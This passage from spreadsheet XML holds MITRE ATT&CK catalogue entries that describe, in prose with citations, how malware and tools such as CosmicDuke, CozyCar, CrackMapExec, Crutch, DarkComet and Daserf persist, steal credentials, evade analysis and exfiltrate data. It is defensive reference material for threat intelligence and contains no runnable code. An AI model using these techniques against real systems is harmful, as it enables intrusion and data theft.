    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[CookieMiner](https://attack.mitre.org/software/S0492) has used base64 encoding to obfuscate scripts on the system.(Citation: Unit42 CookieMiner Jan 2019) </t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used python scripts on the user’s system, as well as the Python variant of the [Empire](https://attack.mitre.org/software/S0363) agent, EmPyre.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has loaded coinmining software onto systems to mine for Koto cryptocurrency. (Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can steal Google Chrome and Apple Safari browser cookies from the victim’s machine. (Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used a Unix shell script to run a series of commands targeting macOS.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files automatically over FTP to remote servers.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) copies and exfiltrates the clipboard contents every 30 seconds.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including Web browsers.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from local hard drives with file extensions that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from network shared drives with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from removable media with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) searches attached and mounted drives for file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses a keylogger.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>LSA Secrets</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects LSA secrets.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses scheduled tasks typically named "Watchmon Service" for persistence.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) takes periodic screenshots and exfiltrates them.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects Windows account hashes.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) contains a custom version of the RC4 algorithm that includes a programming error.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) can use HTTP or HTTPS for command and control to hard-coded C2 servers.(Citation: F-Secure The Dukes)(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses Windows services typically named "javamtsup" for persistence.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) has executed [Mimikatz](https://attack.mitre.org/software/S0002) to harvest stored credentials from the victim and further victim penetration.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The payload of [CozyCar](https://attack.mitre.org/software/S0046) is encrypted with simple XOR with a rotating key. The [CozyCar](https://attack.mitre.org/software/S0046) configuration file has been encrypted with RC4 keys.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys: &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Rename System Utilities</t>
  </si>
  <si>
    <t>The [CozyCar](https://attack.mitre.org/software/S0046) dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The [CozyCar](https://attack.mitre.org/software/S0046) dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main [CozyCar](https://attack.mitre.org/software/S0046) component.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a scheduled task.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Password stealer and NTLM stealer modules in [CozyCar](https://attack.mitre.org/software/S0046) harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The main [CozyCar](https://attack.mitre.org/software/S0046) dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>A system info module in [CozyCar](https://attack.mitre.org/software/S0046) gathers information on the victim host’s configuration.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Some versions of [CozyCar](https://attack.mitre.org/software/S0046) will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046)'s main method of communicating with its C2 servers is using HTTP or HTTPS.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>A module in [CozyCar](https://attack.mitre.org/software/S0046) allows arbitrary commands to be executed by invoking &lt;code&gt;C:\Windows\System32\cmd.exe&lt;/code&gt;.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a Windows service.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>At (Windows)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can set a scheduled task on the target system to execute commands remotely using [at](https://attack.mitre.org/software/S0110).(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force supplied user credentials across a network range.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the domain user accounts on a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can gather the user accounts within domain groups.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover specified filetypes and log files on a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords from LSA secrets for the targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can create a registry key using wdigest.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>NTDS</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the shared folders and associated permissions for a targeted network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can pass the hash to authenticate via SMB.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force passwords for a specified user on a single target system or across an entire network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover the password policies applied to the target system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force credential authentication by using a supplied list of usernames and a single password.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can execute PowerShell commands via WMI.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active IP addresses, along with the machine name, within a targeted network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump usernames and hashed passwords from the SAM.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the system drives and associated system name.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can collect DNS information from the targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active sessions for a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can execute remote commands using Windows Management Instrumentation.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a module to steal credentials from Web browsers on the victim machine.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a module to collect data from removable drives.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to retrieve files from its C2 server.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect and exfiltrate emails from Outlook.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) uses a custom TCP protocol for C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to list processes.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to perform screen captures.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect information about anti-virus software on the victim.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect the victim PC name and operating system.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect the victim MAC address and LAN IP.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) can list all files on a system.</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) creates a Launch Agent on macOS.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) uses run keys for persistence on Windows</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) is capable of taking screen captures.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has used the WinRAR utility to compress and encrypt stolen files.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can automatically monitor removable drives in a loop and copy interesting files.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has automatically exfiltrated stolen files to Dropbox.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can use Dropbox to receive commands and upload stolen data.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate files from compromised systems.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can monitor removable drives and exfiltrate files matching a given extension list.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate data over the primary C2 channel (Dropbox HTTP API).(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has exfiltrated stolen data to Dropbox.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has used a hardcoded GitHub repository as a fallback channel.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has staged stolen files in the &lt;code&gt;C:\AMD\Temp&lt;/code&gt; directory.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has established persistence with a scheduled task impersonating the Outlook item finder.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can monitor for removable drives being plugged into the compromised machine.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has the ability to persist using scheduled tasks.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has conducted C2 communications with a Dropbox account using the HTTP API.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can retrieve files from the local file system.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can engage in encrypted communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability delete files from a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can scan a directory to identify files for deletion.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability to send and receive files.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can use TCP in communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can gather data on the user of a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) decodes an embedded configuration using XOR.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) lists files on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) downloads and uploads files on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) uses Rundll32 to ensure only a single instance of itself is running at once.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) can capture microphone data from the victim's machine.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) can download and execute additional payloads.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of logging keystrokes.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is encrypted using single-byte XOR.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of capturing screenshots of the victim's machine.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can scan directories on a compromised host.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) has had its payload named with a dot prefix to make it hidden from view in the Finder application.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can download its payload from a C2 server.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a LaunchAgent.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a Launch Daemon.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>The [Dacls](https://attack.mitre.org/software/S0497) Mach-O binary has been disguised as a .nib file.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can encrypt its configuration file with AES CBC.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can collect data on running and parent processes.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can use HTTPS in C2 communications.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can listen in to victims' conversations through the system’s microphone.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can steal data from the clipboard.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can execute various types of scripts on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like the Windows Firewall.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like anti-virus.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can load any files onto the infected machine to execute.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has a keylogging capability.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has dropped itself onto victim machines with file names such as WinDefender.Exe and winupdate.exe in an apparent attempt to masquerade as a legitimate file.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) adds a Registry value for its installation routine to the Registry Key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Enable LUA=”0”&lt;/code&gt; and &lt;code&gt;HKEY_CURRENT_USER\Software\DC3_FEXEC&lt;/code&gt;.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can list active processes running on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) adds several Registry entries to enable automatic execution at every system startup.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can open an active screen of the victim’s machine and take control of the mouse and keyboard.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has the option to compress its payload using UPX or MPRESS.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can collect the computer name, RAM used, and operating system version from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) gathers the username from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can access the victim’s webcam to take pictures.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can use HTTP for C2 communications.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can launch a remote shell to execute commands on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) hides collected data in password-protected .rar archives.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>Some [Daserf](https://attack.mitre.org/software/S0187) samples were signed with a stolen digital certificate.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>Analysis of [Daserf](https://attack.mitre.org/software/S0187) has shown that it regularly undergoes technical improvements to evade anti-virus detection.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can download remote files.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can log keystrokes.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) leverages [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to steal credentials.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can take screenshots.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>A version of [Daserf](https://attack.mitre.org/software/S0187) uses the MPRESS packer.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses custom base64 encoding to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can use steganography to hide malicious code downloaded to the victim.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses RC4 encryption to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can execute shell commands.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) leverages vulnerable versions of Flash to perform execution.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) uses HTTP for communication with the C2 server.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) compressed collected data using zlib.(Citation: Securelist Denis April 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) exploits a security vulnerability to load a fake DLL and execute its code.(Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has used DNS tunneling for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) will decrypt important strings used for C&amp;C communication.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has a command to delete files from the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has several commands to search directories for files.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) replaces the nonexistent Windows DLL "msfte.dll" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) deploys additional backdoors and hacking tools to the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) used the &lt;code&gt;IsDebuggerPresent&lt;/code&gt;, &lt;code&gt;OutputDebugString&lt;/code&gt;, and &lt;code&gt;SetLastError&lt;/code&gt; APIs to avoid debugging. [Denis](https://attack.mitre.org/software/S0354) used &lt;code&gt;GetProcAddress&lt;/code&gt; and &lt;code&gt;LoadLibrary&lt;/code&gt; to dynamically resolve APIs. [Denis](https://attack.mitre.org/software/S0354) also used the &lt;code&gt;Wow64SetThreadContext&lt;/code&gt; API as part of a process hollowing process.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
